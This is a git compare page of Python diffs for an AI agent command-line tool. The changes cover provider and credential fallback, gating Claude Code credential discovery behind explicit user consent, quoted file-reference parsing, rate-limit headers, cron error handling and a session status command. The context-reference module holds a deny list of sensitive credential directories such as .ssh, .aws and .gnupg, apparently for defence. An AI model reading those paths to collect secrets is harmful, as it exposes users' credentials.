Compare commits
82 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 611b89c2a7 | |||
| 9a0c44f908 | |||
| baddb6f717 | |||
| e8034e2f6a | |||
| dab5ec8245 | |||
| 79565630b0 | |||
| 7033dbf5d6 | |||
| 9555a0cf31 | |||
| f00dd3169f | |||
| 8414f41856 | |||
| 672cc80915 | |||
| fbe28352e4 | |||
| 5b42aecfa7 | |||
| 989b950fbc | |||
| 2a6cbf52d0 | |||
| c5ab760528 | |||
| a4fc38c5b1 | |||
| 0e939af7c2 | |||
| 475cbce775 | |||
| c1f832a610 | |||
| 6f63ba9c8f | |||
| 3e24ba1656 | |||
| d8cd7974d8 | |||
| e8f16f7432 | |||
| e1167c5c07 | |||
| 8254b820ec | |||
| 2b0912ab18 | |||
| ea81aa2eec | |||
| 496e378b10 | |||
| 03f23f10e1 | |||
| 8bcb8b8e87 | |||
| f07b35acba | |||
| 363d5d57be | |||
| 7ccdb74364 | |||
| 6c115440fd | |||
| 4fb42d0193 | |||
| f83e86d826 | |||
| 0bea603510 | |||
| 360b21ce95 | |||
| 37a1c75716 | |||
| c6e1add6f1 | |||
| 2c99b4e79b | |||
| 71036a7a75 | |||
| 7e28b7b5d5 | |||
| a093eb47f7 | |||
| f72faf191c | |||
| 7e60b09274 | |||
| 970192f183 | |||
| 5b8beb0ead | |||
| 7cec784b64 | |||
| be4f049f46 | |||
| 5b63bf7f9a | |||
| 4a65c9cd08 | |||
| 916fbf362c | |||
| b730c2955a | |||
| fd5cc6e1b4 | |||
| 1662b7f82a | |||
| e3b395e17d | |||
| 0cdf5232ae | |||
| 49bba1096e | |||
| fd3e855d58 | |||
| 5fc5ced972 | |||
| 0e315a6f02 | |||
| 6d2fa03837 | |||
| f3ae1d765d | |||
| 49da1ff1b1 | |||
| 76a1e6e0fe | |||
| 21bb2547c6 | |||
| 58413c411f | |||
| cc12ab8290 | |||
| 74e883ca37 | |||
| e376a9b2c9 | |||
| 2629927032 | |||
| aedf6c7964 | |||
| 5a1cce53e4 | |||
| 419b719c2b | |||
| f3fb3eded4 | |||
| d7164603da | |||
| e683c9db90 | |||
| 7663c98c1e | |||
| 714809634f | |||
| f4c7086035 |
+68
-17
@@ -687,6 +687,15 @@ def _resolve_api_key_provider() -> Tuple[Optional[OpenAI], Optional[str]]:
|
||||
if pconfig.auth_type != "api_key":
|
||||
continue
|
||||
if provider_id == "anthropic":
|
||||
# Only try anthropic when the user has explicitly configured it.
|
||||
# Without this gate, Claude Code credentials get silently used
|
||||
# as auxiliary fallback when the user's primary provider fails.
|
||||
try:
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
if not is_provider_explicitly_configured("anthropic"):
|
||||
continue
|
||||
except ImportError:
|
||||
pass
|
||||
return _try_anthropic()
|
||||
|
||||
pool_present, entry = _select_pool_entry(provider_id)
|
||||
@@ -848,7 +857,7 @@ def _read_main_provider() -> str:
|
||||
return ""
|
||||
|
||||
|
||||
def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str], Optional[str]]:
|
||||
"""Resolve the active custom/main endpoint the same way the main CLI does.
|
||||
|
||||
This covers both env-driven OPENAI_BASE_URL setups and config-saved custom
|
||||
@@ -861,18 +870,29 @@ def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
runtime = resolve_runtime_provider(requested="custom")
|
||||
except Exception as exc:
|
||||
logger.debug("Auxiliary client: custom runtime resolution failed: %s", exc)
|
||||
return None, None
|
||||
runtime = None
|
||||
|
||||
if not isinstance(runtime, dict):
|
||||
openai_base = os.getenv("OPENAI_BASE_URL", "").strip().rstrip("/")
|
||||
openai_key = os.getenv("OPENAI_API_KEY", "").strip()
|
||||
if not openai_base:
|
||||
return None, None, None
|
||||
runtime = {
|
||||
"base_url": openai_base,
|
||||
"api_key": openai_key,
|
||||
}
|
||||
|
||||
custom_base = runtime.get("base_url")
|
||||
custom_key = runtime.get("api_key")
|
||||
custom_mode = runtime.get("api_mode")
|
||||
if not isinstance(custom_base, str) or not custom_base.strip():
|
||||
return None, None
|
||||
return None, None, None
|
||||
|
||||
custom_base = custom_base.strip().rstrip("/")
|
||||
if "openrouter.ai" in custom_base.lower():
|
||||
# requested='custom' falls back to OpenRouter when no custom endpoint is
|
||||
# configured. Treat that as "no custom endpoint" for auxiliary routing.
|
||||
return None, None
|
||||
return None, None, None
|
||||
|
||||
# Local servers (Ollama, llama.cpp, vLLM, LM Studio) don't require auth.
|
||||
# Use a placeholder key — the OpenAI SDK requires a non-empty string but
|
||||
@@ -881,20 +901,33 @@ def _resolve_custom_runtime() -> Tuple[Optional[str], Optional[str]]:
|
||||
if not isinstance(custom_key, str) or not custom_key.strip():
|
||||
custom_key = "no-key-required"
|
||||
|
||||
return custom_base, custom_key.strip()
|
||||
if not isinstance(custom_mode, str) or not custom_mode.strip():
|
||||
custom_mode = None
|
||||
|
||||
return custom_base, custom_key.strip(), custom_mode
|
||||
|
||||
|
||||
def _current_custom_base_url() -> str:
|
||||
custom_base, _ = _resolve_custom_runtime()
|
||||
custom_base, _, _ = _resolve_custom_runtime()
|
||||
return custom_base or ""
|
||||
|
||||
|
||||
def _try_custom_endpoint() -> Tuple[Optional[OpenAI], Optional[str]]:
|
||||
custom_base, custom_key = _resolve_custom_runtime()
|
||||
runtime = _resolve_custom_runtime()
|
||||
if len(runtime) == 2:
|
||||
custom_base, custom_key = runtime
|
||||
custom_mode = None
|
||||
else:
|
||||
custom_base, custom_key, custom_mode = runtime
|
||||
if not custom_base or not custom_key:
|
||||
return None, None
|
||||
if custom_base.lower().startswith(_CODEX_AUX_BASE_URL.lower()):
|
||||
return None, None
|
||||
model = _read_main_model() or "gpt-4o-mini"
|
||||
logger.debug("Auxiliary client: custom endpoint (%s)", model)
|
||||
logger.debug("Auxiliary client: custom endpoint (%s, api_mode=%s)", model, custom_mode or "chat_completions")
|
||||
if custom_mode == "codex_responses":
|
||||
real_client = OpenAI(api_key=custom_key, base_url=custom_base)
|
||||
return CodexAuxiliaryClient(real_client, model), model
|
||||
return OpenAI(api_key=custom_key, base_url=custom_base), model
|
||||
|
||||
|
||||
@@ -1165,6 +1198,18 @@ def _to_async_client(sync_client, model: str):
|
||||
return AsyncOpenAI(**async_kwargs), model
|
||||
|
||||
|
||||
def _normalize_resolved_model(model_name: Optional[str], provider: str) -> Optional[str]:
|
||||
"""Normalize a resolved model for the provider that will receive it."""
|
||||
if not model_name:
|
||||
return model_name
|
||||
try:
|
||||
from hermes_cli.model_normalize import normalize_model_for_provider
|
||||
|
||||
return normalize_model_for_provider(model_name, provider)
|
||||
except Exception:
|
||||
return model_name
|
||||
|
||||
|
||||
def resolve_provider_client(
|
||||
provider: str,
|
||||
model: str = None,
|
||||
@@ -1227,7 +1272,7 @@ def resolve_provider_client(
|
||||
logger.warning("resolve_provider_client: openrouter requested "
|
||||
"but OPENROUTER_API_KEY not set")
|
||||
return None, None
|
||||
final_model = model or default
|
||||
final_model = _normalize_resolved_model(model or default, provider)
|
||||
return (_to_async_client(client, final_model) if async_mode
|
||||
else (client, final_model))
|
||||
|
||||
@@ -1238,7 +1283,7 @@ def resolve_provider_client(
|
||||
logger.warning("resolve_provider_client: nous requested "
|
||||
"but Nous Portal not configured (run: hermes auth)")
|
||||
return None, None
|
||||
final_model = model or default
|
||||
final_model = _normalize_resolved_model(model or default, provider)
|
||||
return (_to_async_client(client, final_model) if async_mode
|
||||
else (client, final_model))
|
||||
|
||||
@@ -1252,7 +1297,7 @@ def resolve_provider_client(
|
||||
logger.warning("resolve_provider_client: openai-codex requested "
|
||||
"but no Codex OAuth token found (run: hermes model)")
|
||||
return None, None
|
||||
final_model = model or _CODEX_AUX_MODEL
|
||||
final_model = _normalize_resolved_model(model or _CODEX_AUX_MODEL, provider)
|
||||
raw_client = OpenAI(api_key=codex_token, base_url=_CODEX_AUX_BASE_URL)
|
||||
return (raw_client, final_model)
|
||||
# Standard path: wrap in CodexAuxiliaryClient adapter
|
||||
@@ -1261,7 +1306,7 @@ def resolve_provider_client(
|
||||
logger.warning("resolve_provider_client: openai-codex requested "
|
||||
"but no Codex OAuth token found (run: hermes model)")
|
||||
return None, None
|
||||
final_model = model or default
|
||||
final_model = _normalize_resolved_model(model or default, provider)
|
||||
return (_to_async_client(client, final_model) if async_mode
|
||||
else (client, final_model))
|
||||
|
||||
@@ -1280,7 +1325,10 @@ def resolve_provider_client(
|
||||
"but base_url is empty"
|
||||
)
|
||||
return None, None
|
||||
final_model = model or _read_main_model() or "gpt-4o-mini"
|
||||
final_model = _normalize_resolved_model(
|
||||
model or _read_main_model() or "gpt-4o-mini",
|
||||
provider,
|
||||
)
|
||||
extra = {}
|
||||
if "api.kimi.com" in custom_base.lower():
|
||||
extra["default_headers"] = {"User-Agent": "KimiCLI/1.30.0"}
|
||||
@@ -1295,7 +1343,7 @@ def resolve_provider_client(
|
||||
_resolve_api_key_provider):
|
||||
client, default = try_fn()
|
||||
if client is not None:
|
||||
final_model = model or default
|
||||
final_model = _normalize_resolved_model(model or default, provider)
|
||||
return (_to_async_client(client, final_model) if async_mode
|
||||
else (client, final_model))
|
||||
logger.warning("resolve_provider_client: custom/main requested "
|
||||
@@ -1310,7 +1358,10 @@ def resolve_provider_client(
|
||||
custom_base = custom_entry.get("base_url", "").strip()
|
||||
custom_key = custom_entry.get("api_key", "").strip() or "no-key-required"
|
||||
if custom_base:
|
||||
final_model = model or _read_main_model() or "gpt-4o-mini"
|
||||
final_model = _normalize_resolved_model(
|
||||
model or _read_main_model() or "gpt-4o-mini",
|
||||
provider,
|
||||
)
|
||||
client = OpenAI(api_key=custom_key, base_url=custom_base)
|
||||
logger.debug(
|
||||
"resolve_provider_client: named custom provider %r (%s)",
|
||||
@@ -1342,7 +1393,7 @@ def resolve_provider_client(
|
||||
if client is None:
|
||||
logger.warning("resolve_provider_client: anthropic requested but no Anthropic credentials found")
|
||||
return None, None
|
||||
final_model = model or default_model
|
||||
final_model = _normalize_resolved_model(model or default_model, provider)
|
||||
return (_to_async_client(client, final_model) if async_mode else (client, final_model))
|
||||
|
||||
creds = resolve_api_key_provider_credentials(provider)
|
||||
@@ -1361,7 +1412,7 @@ def resolve_provider_client(
|
||||
)
|
||||
|
||||
default_model = _API_KEY_PROVIDER_AUX_MODELS.get(provider, "")
|
||||
final_model = model or default_model
|
||||
final_model = _normalize_resolved_model(model or default_model, provider)
|
||||
|
||||
# Provider-specific headers
|
||||
headers = {}
|
||||
|
||||
@@ -13,8 +13,9 @@ from typing import Awaitable, Callable
|
||||
|
||||
from agent.model_metadata import estimate_tokens_rough
|
||||
|
||||
_QUOTED_REFERENCE_VALUE = r'(?:`[^`\n]+`|"[^"\n]+"|\'[^\'\n]+\')'
|
||||
REFERENCE_PATTERN = re.compile(
|
||||
r"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>\S+))"
|
||||
rf"(?<![\w/])@(?:(?P<simple>diff|staged)\b|(?P<kind>file|folder|git|url):(?P<value>{_QUOTED_REFERENCE_VALUE}(?::\d+(?:-\d+)?)?|\S+))"
|
||||
)
|
||||
TRAILING_PUNCTUATION = ",.;!?"
|
||||
_SENSITIVE_HOME_DIRS = (".ssh", ".aws", ".gnupg", ".kube", ".docker", ".azure", ".config/gh")
|
||||
@@ -81,14 +82,10 @@ def parse_context_references(message: str) -> list[ContextReference]:
|
||||
value = _strip_trailing_punctuation(match.group("value") or "")
|
||||
line_start = None
|
||||
line_end = None
|
||||
target = value
|
||||
target = _strip_reference_wrappers(value)
|
||||
|
||||
if kind == "file":
|
||||
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
|
||||
if range_match:
|
||||
target = range_match.group("path")
|
||||
line_start = int(range_match.group("start"))
|
||||
line_end = int(range_match.group("end") or range_match.group("start"))
|
||||
target, line_start, line_end = _parse_file_reference_value(value)
|
||||
|
||||
refs.append(
|
||||
ContextReference(
|
||||
@@ -375,6 +372,38 @@ def _strip_trailing_punctuation(value: str) -> str:
|
||||
return stripped
|
||||
|
||||
|
||||
def _strip_reference_wrappers(value: str) -> str:
|
||||
if len(value) >= 2 and value[0] == value[-1] and value[0] in "`\"'":
|
||||
return value[1:-1]
|
||||
return value
|
||||
|
||||
|
||||
def _parse_file_reference_value(value: str) -> tuple[str, int | None, int | None]:
|
||||
quoted_match = re.match(
|
||||
r'^(?P<quote>`|"|\')(?P<path>.+?)(?P=quote)(?::(?P<start>\d+)(?:-(?P<end>\d+))?)?$',
|
||||
value,
|
||||
)
|
||||
if quoted_match:
|
||||
line_start = quoted_match.group("start")
|
||||
line_end = quoted_match.group("end")
|
||||
return (
|
||||
quoted_match.group("path"),
|
||||
int(line_start) if line_start is not None else None,
|
||||
int(line_end or line_start) if line_start is not None else None,
|
||||
)
|
||||
|
||||
range_match = re.match(r"^(?P<path>.+?):(?P<start>\d+)(?:-(?P<end>\d+))?$", value)
|
||||
if range_match:
|
||||
line_start = int(range_match.group("start"))
|
||||
return (
|
||||
range_match.group("path"),
|
||||
line_start,
|
||||
int(range_match.group("end") or range_match.group("start")),
|
||||
)
|
||||
|
||||
return _strip_reference_wrappers(value), None, None
|
||||
|
||||
|
||||
def _remove_reference_tokens(message: str, refs: list[ContextReference]) -> str:
|
||||
pieces: list[str] = []
|
||||
cursor = 0
|
||||
|
||||
@@ -1059,6 +1059,17 @@ def _seed_from_singletons(provider: str, entries: List[PooledCredential]) -> Tup
|
||||
auth_store = _load_auth_store()
|
||||
|
||||
if provider == "anthropic":
|
||||
# Only auto-discover external credentials (Claude Code, Hermes PKCE)
|
||||
# when the user has explicitly configured anthropic as their provider.
|
||||
# Without this gate, auxiliary client fallback chains silently read
|
||||
# ~/.claude/.credentials.json without user consent. See PR #4210.
|
||||
try:
|
||||
from hermes_cli.auth import is_provider_explicitly_configured
|
||||
if not is_provider_explicitly_configured("anthropic"):
|
||||
return changed, active_sources
|
||||
except ImportError:
|
||||
pass
|
||||
|
||||
from agent.anthropic_adapter import read_claude_code_credentials, read_hermes_oauth_credentials
|
||||
|
||||
for source_name, creds in (
|
||||
@@ -1066,6 +1077,13 @@ def _seed_from_singletons(provider: str, entries: List[PooledCredential]) -> Tup
|
||||
("claude_code", read_claude_code_credentials()),
|
||||
):
|
||||
if creds and creds.get("accessToken"):
|
||||
# Check if user explicitly removed this source
|
||||
try:
|
||||
from hermes_cli.auth import is_source_suppressed
|
||||
if is_source_suppressed(provider, source_name):
|
||||
continue
|
||||
except ImportError:
|
||||
pass
|
||||
active_sources.add(source_name)
|
||||
changed |= _upsert_entry(
|
||||
entries,
|
||||
|
||||
@@ -112,6 +112,7 @@ _RATE_LIMIT_PATTERNS = [
|
||||
"try again in",
|
||||
"please retry after",
|
||||
"resource_exhausted",
|
||||
"rate increased too quickly", # Alibaba/DashScope throttling
|
||||
]
|
||||
|
||||
# Usage-limit patterns that need disambiguation (could be billing OR rate_limit)
|
||||
|
||||
@@ -213,6 +213,7 @@ _URL_TO_PROVIDER: Dict[str, str] = {
|
||||
"models.github.ai": "copilot",
|
||||
"api.fireworks.ai": "fireworks",
|
||||
"opencode.ai": "opencode-go",
|
||||
"api.x.ai": "xai",
|
||||
}
|
||||
|
||||
|
||||
|
||||
+12
-3
@@ -356,6 +356,14 @@ PLATFORM_HINTS = {
|
||||
"MEDIA:/absolute/path/to/file in your response. Images (.jpg, .png, "
|
||||
".heic) appear as photos and other files arrive as attachments."
|
||||
),
|
||||
"weixin": (
|
||||
"You are on Weixin/WeChat. Markdown formatting is supported, so you may use it when "
|
||||
"it improves readability, but keep the message compact and chat-friendly. You can send media files natively: "
|
||||
"include MEDIA:/absolute/path/to/file in your response. Images are sent as native "
|
||||
"photos, videos play inline when supported, and other files arrive as downloadable "
|
||||
"documents. You can also include image URLs in markdown format  and they "
|
||||
"will be downloaded and sent as native media when possible."
|
||||
),
|
||||
}
|
||||
|
||||
CONTEXT_FILE_MAX_CHARS = 20_000
|
||||
@@ -479,7 +487,7 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
(True, {}, "") to err on the side of showing the skill.
|
||||
"""
|
||||
try:
|
||||
raw = skill_file.read_text(encoding="utf-8")[:2000]
|
||||
raw = skill_file.read_text(encoding="utf-8")
|
||||
frontmatter, _ = parse_frontmatter(raw)
|
||||
|
||||
if not skill_matches_platform(frontmatter):
|
||||
@@ -487,7 +495,7 @@ def _parse_skill_file(skill_file: Path) -> tuple[bool, dict, str]:
|
||||
|
||||
return True, frontmatter, extract_skill_description(frontmatter)
|
||||
except Exception as e:
|
||||
logger.debug("Failed to parse skill file %s: %s", skill_file, e)
|
||||
logger.warning("Failed to parse skill file %s: %s", skill_file, e)
|
||||
return True, {}, ""
|
||||
|
||||
|
||||
@@ -550,9 +558,10 @@ def build_skills_system_prompt(
|
||||
# ── Layer 1: in-process LRU cache ─────────────────────────────────
|
||||
# Include the resolved platform so per-platform disabled-skill lists
|
||||
# produce distinct cache entries (gateway serves multiple platforms).
|
||||
from gateway.session_context import get_session_env
|
||||
_platform_hint = (
|
||||
os.environ.get("HERMES_PLATFORM")
|
||||
or os.environ.get("HERMES_SESSION_PLATFORM")
|
||||
or get_session_env("HERMES_SESSION_PLATFORM")
|
||||
or ""
|
||||
)
|
||||
cache_key = (
|
||||
|
||||
@@ -97,8 +97,12 @@ def parse_rate_limit_headers(
|
||||
|
||||
Returns None if no rate limit headers are present.
|
||||
"""
|
||||
# Normalize to lowercase so lookups work regardless of how the server
|
||||
# capitalises headers (HTTP header names are case-insensitive per RFC 7230).
|
||||
lowered = {k.lower(): v for k, v in headers.items()}
|
||||
|
||||
# Quick check: at least one rate limit header must exist
|
||||
has_any = any(k.lower().startswith("x-ratelimit-") for k in headers)
|
||||
has_any = any(k.startswith("x-ratelimit-") for k in lowered)
|
||||
if not has_any:
|
||||
return None
|
||||
|
||||
@@ -109,9 +113,9 @@ def parse_rate_limit_headers(
|
||||
# resource="tokens", suffix="-1h" -> per-hour
|
||||
tag = f"{resource}{suffix}"
|
||||
return RateLimitBucket(
|
||||
limit=_safe_int(headers.get(f"x-ratelimit-limit-{tag}")),
|
||||
remaining=_safe_int(headers.get(f"x-ratelimit-remaining-{tag}")),
|
||||
reset_seconds=_safe_float(headers.get(f"x-ratelimit-reset-{tag}")),
|
||||
limit=_safe_int(lowered.get(f"x-ratelimit-limit-{tag}")),
|
||||
remaining=_safe_int(lowered.get(f"x-ratelimit-remaining-{tag}")),
|
||||
reset_seconds=_safe_float(lowered.get(f"x-ratelimit-reset-{tag}")),
|
||||
captured_at=now,
|
||||
)
|
||||
|
||||
|
||||
@@ -145,10 +145,11 @@ def get_disabled_skill_names(platform: str | None = None) -> Set[str]:
|
||||
if not isinstance(skills_cfg, dict):
|
||||
return set()
|
||||
|
||||
from gateway.session_context import get_session_env
|
||||
resolved_platform = (
|
||||
platform
|
||||
or os.getenv("HERMES_PLATFORM")
|
||||
or os.getenv("HERMES_SESSION_PLATFORM")
|
||||
or get_session_env("HERMES_SESSION_PLATFORM")
|
||||
)
|
||||
if resolved_platform:
|
||||
platform_disabled = (skills_cfg.get("platform_disabled") or {}).get(
|
||||
|
||||
@@ -181,6 +181,7 @@ def resolve_turn_route(user_message: str, routing_config: Optional[Dict[str, Any
|
||||
"api_mode": runtime.get("api_mode"),
|
||||
"command": runtime.get("command"),
|
||||
"args": list(runtime.get("args") or []),
|
||||
"credential_pool": runtime.get("credential_pool"),
|
||||
},
|
||||
"label": f"smart route → {route.get('model')} ({runtime.get('provider')})",
|
||||
"signature": (
|
||||
|
||||
@@ -319,7 +319,7 @@ def load_cli_config() -> Dict[str, Any]:
|
||||
# Load from file if exists
|
||||
if config_path.exists():
|
||||
try:
|
||||
with open(config_path, "r") as f:
|
||||
with open(config_path, "r", encoding="utf-8") as f:
|
||||
file_config = yaml.safe_load(f) or {}
|
||||
|
||||
_file_has_terminal_config = "terminal" in file_config
|
||||
@@ -1048,7 +1048,7 @@ def _termux_example_image_path(filename: str = "cat.png") -> str:
|
||||
|
||||
|
||||
def _split_path_input(raw: str) -> tuple[str, str]:
|
||||
"""Split a leading file path token from trailing free-form text.
|
||||
r"""Split a leading file path token from trailing free-form text.
|
||||
|
||||
Supports quoted paths and backslash-escaped spaces so callers can accept
|
||||
inputs like:
|
||||
@@ -1719,6 +1719,7 @@ class HermesCLI:
|
||||
self._secret_state = None
|
||||
self._secret_deadline = 0
|
||||
self._spinner_text: str = "" # thinking spinner text for TUI
|
||||
self._tool_start_time: float = 0.0 # monotonic timestamp when current tool started (for live elapsed)
|
||||
self._command_running = False
|
||||
self._command_status = ""
|
||||
self._attached_images: list[Path] = []
|
||||
@@ -2027,6 +2028,25 @@ class HermesCLI:
|
||||
current_model = (self.model or "").strip()
|
||||
changed = False
|
||||
|
||||
try:
|
||||
from hermes_cli.model_normalize import (
|
||||
_AGGREGATOR_PROVIDERS,
|
||||
normalize_model_for_provider,
|
||||
)
|
||||
|
||||
if resolved_provider not in _AGGREGATOR_PROVIDERS:
|
||||
normalized_model = normalize_model_for_provider(current_model, resolved_provider)
|
||||
if normalized_model and normalized_model != current_model:
|
||||
if not self._model_is_default:
|
||||
self.console.print(
|
||||
f"[yellow]⚠️ Normalized model '{current_model}' to '{normalized_model}' for {resolved_provider}.[/]"
|
||||
)
|
||||
self.model = normalized_model
|
||||
current_model = normalized_model
|
||||
changed = True
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
if resolved_provider == "copilot":
|
||||
try:
|
||||
from hermes_cli.models import copilot_model_api_mode, normalize_copilot_model_id
|
||||
@@ -2072,7 +2092,7 @@ class HermesCLI:
|
||||
return changed
|
||||
|
||||
if resolved_provider != "openai-codex":
|
||||
return False
|
||||
return changed
|
||||
|
||||
# 1. Strip provider prefix ("openai/gpt-5.4" → "gpt-5.4")
|
||||
if "/" in current_model:
|
||||
@@ -2111,6 +2131,7 @@ class HermesCLI:
|
||||
if not text:
|
||||
self._flush_reasoning_preview(force=True)
|
||||
self._spinner_text = text or ""
|
||||
self._tool_start_time = 0.0 # clear tool timer when switching to thinking
|
||||
self._invalidate()
|
||||
|
||||
# ── Streaming display ────────────────────────────────────────────────
|
||||
@@ -3360,22 +3381,22 @@ class HermesCLI:
|
||||
pass # Don't crash on import errors
|
||||
|
||||
def _show_status(self):
|
||||
"""Show current status bar."""
|
||||
"""Show compact startup status line."""
|
||||
# Get tool count
|
||||
tools = get_tool_definitions(enabled_toolsets=self.enabled_toolsets, quiet_mode=True)
|
||||
tool_count = len(tools) if tools else 0
|
||||
|
||||
|
||||
# Format model name (shorten if needed)
|
||||
model_short = self.model.split("/")[-1] if "/" in self.model else self.model
|
||||
if len(model_short) > 30:
|
||||
model_short = model_short[:27] + "..."
|
||||
|
||||
|
||||
# Get API status indicator
|
||||
if self.api_key:
|
||||
api_indicator = "[green bold]●[/]"
|
||||
else:
|
||||
api_indicator = "[red bold]●[/]"
|
||||
|
||||
|
||||
# Build status line with proper markup
|
||||
toolsets_info = ""
|
||||
if self.enabled_toolsets and "all" not in self.enabled_toolsets:
|
||||
@@ -3390,6 +3411,59 @@ class HermesCLI:
|
||||
f"[dim #B8860B]·[/] [bold cyan]{tool_count} tools[/]"
|
||||
f"{toolsets_info}{provider_info}"
|
||||
)
|
||||
|
||||
def _show_session_status(self):
|
||||
"""Show gateway-style status for the current CLI session."""
|
||||
session_meta = {}
|
||||
if self._session_db:
|
||||
try:
|
||||
session_meta = self._session_db.get_session(self.session_id) or {}
|
||||
except Exception:
|
||||
session_meta = {}
|
||||
|
||||
title = (session_meta.get("title") or "").strip()
|
||||
|
||||
created_at = self.session_start
|
||||
started_at = session_meta.get("started_at")
|
||||
if started_at:
|
||||
try:
|
||||
created_at = datetime.fromtimestamp(float(started_at))
|
||||
except Exception:
|
||||
created_at = self.session_start
|
||||
|
||||
updated_at = created_at
|
||||
for field in ("updated_at", "last_updated_at", "last_activity_at"):
|
||||
value = session_meta.get(field)
|
||||
if not value:
|
||||
continue
|
||||
try:
|
||||
updated_at = datetime.fromtimestamp(float(value))
|
||||
break
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
agent = getattr(self, "agent", None)
|
||||
total_tokens = getattr(agent, "session_total_tokens", 0) or 0
|
||||
provider = getattr(self, "provider", None) or "unknown"
|
||||
model = getattr(self, "model", None) or "(unknown)"
|
||||
is_running = bool(getattr(self, "_agent_running", False))
|
||||
|
||||
lines = [
|
||||
"Hermes CLI Status",
|
||||
"",
|
||||
f"Session ID: {self.session_id}",
|
||||
f"Path: {display_hermes_home()}",
|
||||
]
|
||||
if title:
|
||||
lines.append(f"Title: {title}")
|
||||
lines.extend([
|
||||
f"Model: {model} ({provider})",
|
||||
f"Created: {created_at.strftime('%Y-%m-%d %H:%M')}",
|
||||
f"Last Activity: {updated_at.strftime('%Y-%m-%d %H:%M')}",
|
||||
f"Tokens: {total_tokens:,}",
|
||||
f"Agent Running: {'Yes' if is_running else 'No'}",
|
||||
])
|
||||
self.console.print("\n".join(lines), highlight=False, markup=False)
|
||||
|
||||
def _fast_command_available(self) -> bool:
|
||||
try:
|
||||
@@ -4873,6 +4947,8 @@ class HermesCLI:
|
||||
self._handle_skills_command(cmd_original)
|
||||
elif canonical == "platforms":
|
||||
self._show_gateway_status()
|
||||
elif canonical == "status":
|
||||
self._show_session_status()
|
||||
elif canonical == "statusbar":
|
||||
self._status_bar_visible = not self._status_bar_visible
|
||||
state = "visible" if self._status_bar_visible else "hidden"
|
||||
@@ -6071,11 +6147,20 @@ class HermesCLI:
|
||||
Updates the TUI spinner widget so the user can see what the agent
|
||||
is doing during tool execution (fills the gap between thinking
|
||||
spinner and next response). Also plays audio cue in voice mode.
|
||||
|
||||
On tool.started, records a monotonic timestamp so get_spinner_text()
|
||||
can show a live elapsed timer (the TUI poll loop already invalidates
|
||||
every ~0.15s, so the counter updates automatically).
|
||||
"""
|
||||
# Only act on tool.started; ignore tool.completed, reasoning.available, etc.
|
||||
if event_type == "tool.completed":
|
||||
import time as _time
|
||||
self._tool_start_time = 0.0
|
||||
self._invalidate()
|
||||
return
|
||||
if event_type != "tool.started":
|
||||
return
|
||||
if function_name and not function_name.startswith("_"):
|
||||
import time as _time
|
||||
from agent.display import get_tool_emoji
|
||||
emoji = get_tool_emoji(function_name)
|
||||
label = preview or function_name
|
||||
@@ -6084,6 +6169,7 @@ class HermesCLI:
|
||||
if _pl > 0 and len(label) > _pl:
|
||||
label = label[:_pl - 3] + "..."
|
||||
self._spinner_text = f"{emoji} {label}"
|
||||
self._tool_start_time = _time.monotonic()
|
||||
self._invalidate()
|
||||
|
||||
if not self._voice_mode:
|
||||
@@ -7925,7 +8011,7 @@ class HermesCLI:
|
||||
agent_name = get_active_skin().get_branding("agent_name", "Hermes Agent")
|
||||
msg = f"\n{agent_name} has been suspended. Run `fg` to bring {agent_name} back."
|
||||
def _suspend():
|
||||
os.write(1, msg.encode())
|
||||
os.write(1, msg.encode("utf-8", errors="replace"))
|
||||
os.kill(0, _sig.SIGTSTP)
|
||||
run_in_terminal(_suspend)
|
||||
|
||||
@@ -8285,6 +8371,17 @@ class HermesCLI:
|
||||
txt = cli_ref._spinner_text
|
||||
if not txt:
|
||||
return []
|
||||
# Append live elapsed timer when a tool is running
|
||||
t0 = cli_ref._tool_start_time
|
||||
if t0 > 0:
|
||||
import time as _time
|
||||
elapsed = _time.monotonic() - t0
|
||||
if elapsed >= 60:
|
||||
_m, _s = int(elapsed // 60), int(elapsed % 60)
|
||||
elapsed_str = f"{_m}m {_s}s"
|
||||
else:
|
||||
elapsed_str = f"{elapsed:.1f}s"
|
||||
return [('class:hint', f' {txt} ({elapsed_str})')]
|
||||
return [('class:hint', f' {txt}')]
|
||||
|
||||
def get_spinner_height():
|
||||
@@ -8819,6 +8916,7 @@ class HermesCLI:
|
||||
finally:
|
||||
self._agent_running = False
|
||||
self._spinner_text = ""
|
||||
self._tool_start_time = 0.0
|
||||
|
||||
app.invalidate() # Refresh status line
|
||||
|
||||
|
||||
+10
-7
@@ -31,7 +31,7 @@ except ImportError:
|
||||
# Configuration
|
||||
# =============================================================================
|
||||
|
||||
HERMES_DIR = get_hermes_home()
|
||||
HERMES_DIR = get_hermes_home().resolve()
|
||||
CRON_DIR = HERMES_DIR / "cron"
|
||||
JOBS_FILE = CRON_DIR / "jobs.json"
|
||||
OUTPUT_DIR = CRON_DIR / "output"
|
||||
@@ -338,10 +338,12 @@ def load_jobs() -> List[Dict[str, Any]]:
|
||||
save_jobs(jobs)
|
||||
logger.warning("Auto-repaired jobs.json (had invalid control characters)")
|
||||
return jobs
|
||||
except Exception:
|
||||
return []
|
||||
except IOError:
|
||||
return []
|
||||
except Exception as e:
|
||||
logger.error("Failed to auto-repair jobs.json: %s", e)
|
||||
raise RuntimeError(f"Cron database corrupted and unrepairable: {e}") from e
|
||||
except IOError as e:
|
||||
logger.error("IOError reading jobs.json: %s", e)
|
||||
raise RuntimeError(f"Failed to read cron database: {e}") from e
|
||||
|
||||
|
||||
def save_jobs(jobs: List[Dict[str, Any]]):
|
||||
@@ -452,6 +454,7 @@ def create_job(
|
||||
"last_run_at": None,
|
||||
"last_status": None,
|
||||
"last_error": None,
|
||||
"last_delivery_error": None,
|
||||
# Delivery configuration
|
||||
"deliver": deliver,
|
||||
"origin": origin, # Tracks where job was created for "origin" delivery
|
||||
@@ -620,8 +623,8 @@ def mark_job_run(job_id: str, success: bool, error: Optional[str] = None,
|
||||
|
||||
save_jobs(jobs)
|
||||
return
|
||||
|
||||
save_jobs(jobs)
|
||||
|
||||
